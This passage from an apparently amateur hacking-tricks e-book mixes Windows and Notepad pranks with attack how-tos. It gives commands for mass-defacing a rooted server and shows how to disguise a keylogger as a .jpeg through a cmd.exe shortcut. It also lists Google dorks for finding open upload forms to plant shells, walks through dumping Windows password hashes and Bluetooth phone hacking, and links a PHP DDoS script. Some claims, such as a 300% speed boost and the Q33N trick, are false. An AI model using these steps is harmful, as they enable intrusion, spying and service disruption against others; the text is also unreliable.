4. Then It shows some messages there. Be alert on it and be show patience for sometime to find it’s vulernable and type of injection and if db server is mysql and it will find database

name.Then after get it’s database is name like xxxx_xxxx

5. Then Move to another operation to find tables by clicking “tables” as figure shown. Now click “Get tables” Then wait some time if needed

6. After founded the tables ,you can see there will be “users” Put mark on it and click in the ” get columns ” tab

(47)

Chapter 26 –Mass Deface Tutorial :

Note : Only For Educational

Purpose.>!!!

Things Required:

* Rooted server

* Mass deface script Step By Step Guide :

* First we have to download our mass deface file, so as usual we will use the wget function

Type: wget www.somesite.in/massdeface.zip

* As we have downloaded it in a zip file, now we will unzip it by typing Type: unzip massdeface.zip * One you have unziped it , we will now run the script by typing Type: perl massdeface.pl

* Now after we have run the script it will show its usage [ perl mass.pl /tmp/index.html ], so

according to that we have to run it, but before we do so we have to download our deface page using wget .

(48)

Chapter 27 –Hide keyloggers in a .jpg file:

Note : Only For

Educational Purpose.>!!!

Through this trick you can easily hide keyloggers.

First download any key logger from google i think Ardamax is best. After installing just follow these easy steps=>

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is

checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension

of all your files on your pc.

2) Paste a copy of your server on the new created folder. Let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you

want, let’s say for example 'picture.jpeg' 4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES. 5) Now create a shortcut of this 'picture.jpeg' in the same folder. 6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'. 7) Go to properties (on file me.jpeg) and now you need to do some changes there. 8) First of all delete all the text on field 'Start In' and leave it empty. 9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :'C:\WINDOWS\system32\cmd.exe / c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS \system32\cmd.exe /c soccer.avi'. 11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run. 12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this

(49)
(50)

Chapter 28 –Increase Internet Speed Upto 300% (Only Mozilla):

This is a short trick on how to increase your internet 300% Faster or higher. So That You Can => * Increase your browsing experience

* Play online games LAG free * Load videos almost instantly

* Turn your slow internet connection into Broadband DSL or even T1 * Download anything faster with our “intelligent packet configurator” * Increase Speeds Up To 375% Faster!

PLEASE NOTE: Only works for Mozilla Firefox 1) Open Mozilla Firefox.

2) In address bar type: “about:config”

3)Look for were it says “network.http.pipelining” to TRUE (Double Click it until it says TRUE)

4)Look for “network.http.proxy.pipelining” to TRUE (Same way as stated above)

5) Now. RightClick Anywhere then click “Create New” Then “Integer”. Name it “nglayout.initialpaint.delay”

Then Click Ok, then put the nu mber “0? (Zero) in the next box 6) Click OK,

(51)

Chapter 29 – “Encodable” Shell Upload Vulnerability :

Just Follow These Easy steps : Goto: google.com and

Enter this dork : "intext:File Upload by Encodable"

The search result open up with 166,000 results but some results are fake ... its may be malwaers so pick real things only , "Upload a file" You will this title in search results here :)

click the sites sites only which comes with upload a file title after click the link you'll got a upload form

you'll saw some options in this form like name Description email etc ... type anything in these boxes but add a email in email box, dont use your own put this one billy@microsoft.com , admin@nasa.gov etc :P

now choose you file and upload it :)

after clicking on upload button a pop up will be open ... dont close it, it will automatilcly closed

after uploading file

in some sites you'll got you uploaded file link after uploading on website and if you did not file it then try these url

/upload/files/

(52)

Chapter 30 – Hack Administrator Password in Window XP :

Just follow steps below.

1) Download Cain & Abel v2.0 from www.oxid.it and install it. 2)Start Cain

3)Click on Cracker tab , on the left choose LM & NTLM Hashes and click on + sign icon on toolbar then Dump NT Hashes from Local machine

4) Now you will see

(53)
(54)

Chapter 31 –How To Play Movie in Desktop backround :

Step 1:- Go to start and from accessories click on Paint

Step 2:- Now Run any movie and in full screen press print screen key to capture the screen. Here I am Watching Movie 17 again just starting.

Step 3:-Save it as movie.PNG. Do not close the player where is movie is playing. Step 4:- Now click on the saved picture, right click and select set as background. Step 5:- And you will see movie

(55)

Chapter 32 –How To Change UR IP:

1. Click on "Start" in the bottom left hand corner of screen 2. Click on "Run" 3.

Type in "cmd" and hit ok You should now be at an MSDOS prompt screen. 4.

Type "ipconfig /release" just like that, and hit "enter" 5. Type "exit" and leave

the prompt 6. Right-click on "Network Places" or "My Network Places" on

your desktop. 7. Click on "properties You should now be on a screen with

something titled "Local Area Connection", or something close to that, and, if

you have a network hooked up, all of your other networks. 8. Right click on

"Local Area Connection" and click "properties" 9. Double-click on the

"Internet Protocol (TCP/IP)" from the list under the "General" tab 10. Click on

"Use the following IP address" under the "General" tab 11. Create an IP

address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).

12. Press "Tab" and it should automatically fill in the "Subnet Mask" section

with default numbers. 13. Hit the "Ok" button here 14. Hit the "Ok" button

again You should now be back to the "Local Area Connection" screen. 15.

Right-click back on "Local Area Connection" and go to properties again. 16. Go

back to the "TCP/IP" settings 17. This time, select "Obtain an IP address

(56)

Chapter 33 –hacking Mobile Using Bluetooth:

Note : Only For

Educational Purpose.>!!!

Super Bluetooth hack 2009 is one of the most downloaded Bluetooth hacking

tools. Super bluetooth hack 2009 is used for mobile based Symbian operating

system to hack & manage any mobiloe near you which is vulnerable to

Bluetoothhacking attack.

Download : http://www.mobicreed.com/wp

content/uploads/2009/05/ftp_btmobicreedcom.rar

How To Install Super Bluetooth Hack 2009 1) Download to PC

2) Transfer it to your Bluetooth enabled mobile.

3) Run the Installer (Remember, You must have Java enabled phone for

installing i)

4) He finds it and you will be able to run program

5) Select the language and configure it.

6) Click > Connection

7) Click > Search Devices

(57)

Chapter 34 – “Image Uploader” Shell Upload Vulnerability:

Note : Only For Educational Purpose.>!!!

JuSt follow these steps =>

Google dorks inurl:"default_image.asp" inurl:"default_imagen.asp" inurl:"/box_image.htm"

You'll got a upload option after clicking on link that you got in google serach results Now select your deface, or shell and upload it =D

(58)

Chapter 35 –World Trade Centre Attack In Notepad :

As you might be knowing that the flightnumber of the plane that had hit World

Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a

coincidence or something else but whatever it is, it does startle us.

Open Notepad.

Type “Q33N” (without quotes) in capital letters.

Increase the font size to 72.

(59)

Chapter 36 –Make A Personal Log Book Using Notepad:

Did you know that you can also use Notepad as a simple digital diary or a personal LogBook ? Well, if you didn’t then follow the below mentioned steps to make one for yourself !

Open Notepad.

Type .LOG (in capital letters) and hit enter.

Save it with any name and close it.

Open it again.

(60)

Chapter 37 –Test Ur Antivirus Using Notepad :

You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:

Open Notepad.

Copy the code give below in the notepad file:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUSTEST-FILE!$H+H*

Save it with an .exe extension like testvirus.exe

As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.

(61)

Chapter 38 –Continually Pop The CD Drive Using Notepad:

Open Notepad.

Copy the code given below onto the notepad file: Set oWMP = CreateObject(“WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection do

if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count– 1 colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count– 1 colCDROMs.Item(i).Eject

Next End If

wscript.sleep 5000 loop

Save it as “Anything.VBS”.

(62)

Chapter 39 – Matrix Effect In Notepad :

Not much to explain, just follow the stepsand see the amazing matrix effect happen in your DOS window:

Open Notepad.

Copy the below mentioned text in your notepad file: @echo off

color 02 :start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start

Save the file with .bat extension like Matrix.bat

(63)

Chapter 40 –Change The Header/Footer Of The Notepad File:

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.

Open Notepad.

Click on File -> Page Setup.

Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:

&l Left-align the characters that follow &c Center the characters that follow &r Right-align the characters that follow &d Print the current date

&t Print the current time

(64)

Chapter 41 – Shut Down PC After Convening A Message :

This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:

Open Notepad.

Paste the following code in it: @echo off

msg * Its time to get some rest.

shutdown c “Error! You have to take rest! Byeeeeee” -s

Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat

(65)

Chapter 42 –Type You Are A Fool Continuously Using Notepad :

Open Notepad and paste the following lines given below. ******************************************

Set wshShell=wscript.CreateObject("WScript.Shell") do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys"{SCROLLLOCK}" loop

******************************************

Save the file exatly as "disco.vbs" (without double cots)

Once you open java script the CAPSLOCK; NUMLOCK and SCROLLLOCK will start blinking and swaping their lights repeatedly in a random motion, very rapidly. Now you will be thinking how to stop this random motion

But don't worry

Here is the solution to your query

Press ctrl+left shift+esc ---> Task manager dialogue box will appear over there go to processes tab and select WScript.exe and click end task.

(66)

Chapter 43 – Creating Your Own Search Engine :

Step 1: Go Here

http://www.mydailysearch.com/register.asp Step 2: You will see something like this

(67)

Chapter 44 – Fool Ur Friends With Your Intel® Core™ i11

Processor:

Fool your Friends with your Intel® Core™ i11 Processor

Making fool of friends,colleagues is the most entertaining task. This post would show you a method by which you can change the hardware description of your computer and fool your friends into believing that you have the latest version of processor which is yet to be launched . :D

Just follow the simple steps as given below: Step 1. Go to . Start.. Run ... and type regedit.

This would open the registry editor.

(68)

Step 4. On the Right hand side of the window as you see in the picture . Right Click on ProcessorNameString and click modify.

Step 5. Modify the name to any name you want. Lets sayIntel® Core™ i11 as show below.

(69)
(70)

Chapter 45 –Secret Codes For Android:

1. Complete Information About your Phone

*#*#4636#*#*

This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:

Phone information

Battery information

Battery history

Usage statistics

2. Factory data reset

*#*#7780#*#*This code can be used for a factory data reset. It'll remove following thing

Google account settings stored in your phone System and application data and settings Downloaded applications

It'll NOT remove:Current system software and bundled application SD card files e.g. photos, music files, etc.

Note: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. So you get a chance to cancel your operation. 3. Format Android Phone

*2767*3855#Think before you give this code. This code is used for factory format. It'll remove all files and settings including the internal memory storage. It'll also reinstall the phone firmware.

(71)

*#*#34971539#*#*

This code is used to get information about phone camera. It shows following 4 menus: Update camera firmware in image (Don't try this option)

Update camera firmware in SD card Get camera firmware version

Get firmware update count

WARNING: Never use the first option otherwise your phone camera will stop working and you'll need to take your phone to service center to reinstall camera firmware.

5. End Call/Power *#*#7594#*#*

This one is my favorite one. This code can be used to change the "End Call / Power" button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, AirPlane mode and Power off.

You can change this action using this code. You can enable direct power off on this button so you don't need to waste your time in selecting the option.

6. File Copy for Creating Backup *#*#273283*255*663282*#*#*

This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode *#*#197328640#*#*

This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* WLAN test (Use "Menu" button to start various tests)

*#*#232338#*#* - Shows WiFi MAC address *#*#1472365#*#* - GPS test

*#*#1575#*#* - Another GPS test *#*#232331#*#* - Bluetooth test

*#*#232337#*# - Shows Bluetooth device address 9. Codes to get Firmware version information:

*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate *#*#1234#*#* - PDA and Phone

*#*#1111#*#* - FTA SW Version *#*#2222#*#* - FTA HW Version

*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number 10. Codes to launch various Factory Tests:

*#*#0283#*#* - Packet Loopback *#*#0*#*#* - LCD test

*#*#0673#*#* OR *#*#0289#*#* - Melody test

(72)

version

*#*#2664#*#* - Touch screen test *#*#0588#*#* - Proximity sensor test *#*#3264#*#* - RAM version

(73)

Chapter 46 – php Dos/Ddos Attack Script :

Note : Only For

Educational Purpose.>!!!

You Can Make a DoS attack from your server (using that nice high bandwidth connection provided by your hosting provider) to bring your victims server/PC to its knees.

This script should be used responsibly, I did not create it, im merely distributing it for “educational” purposes. All The Best !

Download From Here:

http://www.nulled-scripts.net/index.php/?6VgQKvjA Fuctions

ddos script php dos

php ddos script php dos script ddos php script ddos script php phpDos

ddos scripts script DDOS php ddos ddos php

denial of service script dos php

ddos attack script php ddoser

script php ddos dos php script php script ddos

ddos script download php DDos attack script script ddos php

(74)

ddos

php dos by exe ddos skript mysql ddos

DENIAL OF SERVICE php script php ddos attack

php ddos download download script ddos ddos online

denial of service scripts

PHP DoS/DDoS (Denial Of Service) Script ddos php tool php curl ddos

(75)

Chapter 47 –Make Ur PC Talk Like Jarvis System :

In Iron Man Movie It was the jarvis Operating which helps Iron Man in completing any computer related task that he wants to perform with voice recognition supportability.Jarvis is totally based on Artificial intelligence aka Artificial Brain. Eventually, we can't have such a huge artificial brain r8 now with us bust we can have a start to this project and believe me you will enjoy it a lot .

Let Me demonstrate you few examples:

G ive a Name to your Computer Like "Jarvis" and when you'll say "Jarvis" it will reply "Hello sir" or "Hello Mr. (Your Name)". or

You : Who are you ??

Computer : I'm chitti The robo Speed, 1 terahertz, memory, one zettabyte (Just Like Rajnikanth's Moive "robot", (Enthiran) in Tamil.)

Example 2 :

YOU: Good Morning Jarvis !

COMPUTER : Good Morning Mr. Stark ! how are you Today !

So, Little wondering how these things going to work out ? Here you can transform your wondering into reality. Follow these codes : Example 1 : Example 1 :

<listenFor>Jarvis</listenFor> <speak>Hello Mr. STark</speak> </command> </speechMacros>

Example 2 :

<listenFor>Good Morning Jarvis</listenFor> <speak>Good Morning Sir. how are you today</speak> </command> </speechMacros>

Further, more you can use these lines of codes for Shutting down Computer : <speechMacros

<command>

<listenFor>Nuke it</listenFor> <speak>Restarting Windows</speak>

<run command="C:\Windows\System32\shutdown.exe"/> </command> </speechMacros>

References

Related documents

 Taking email address from colleagues: While these recipients may have given permission to your colleagues to email them, if they do not recognize where the email is being sent

Your email will be forwarded to either a contact you select from your contact list or to an email address that you enter.. (Note: this is the address where all of your email will

• Access to your previous provider’s email account, including the Web address you use for checking mail, your previous provider email address, user name and password.. •

It is important that your email address is correct, because if you forget your password, the LMS will send an email to this address that will enable you to log in and reset

NOTE: If your name is not in the From or Reply Email Address list, you will need to click on Verify more email addresses and enter your Bucks email address.. You will be sent an

9- Edit your profile on the platform and change your email address to your Microsoft username which is also your American High School email address which you must use in

The second component of the Anti Diet Solution program is the 28 Day Fast Start Diet book, which outlines a 28 day meal plan that’s loaded with the foods that the author says

4.By uploading it by email - You can upload your signatures by sending an email with an image attached to sign@popfax.com from the email address you registered for your Popfax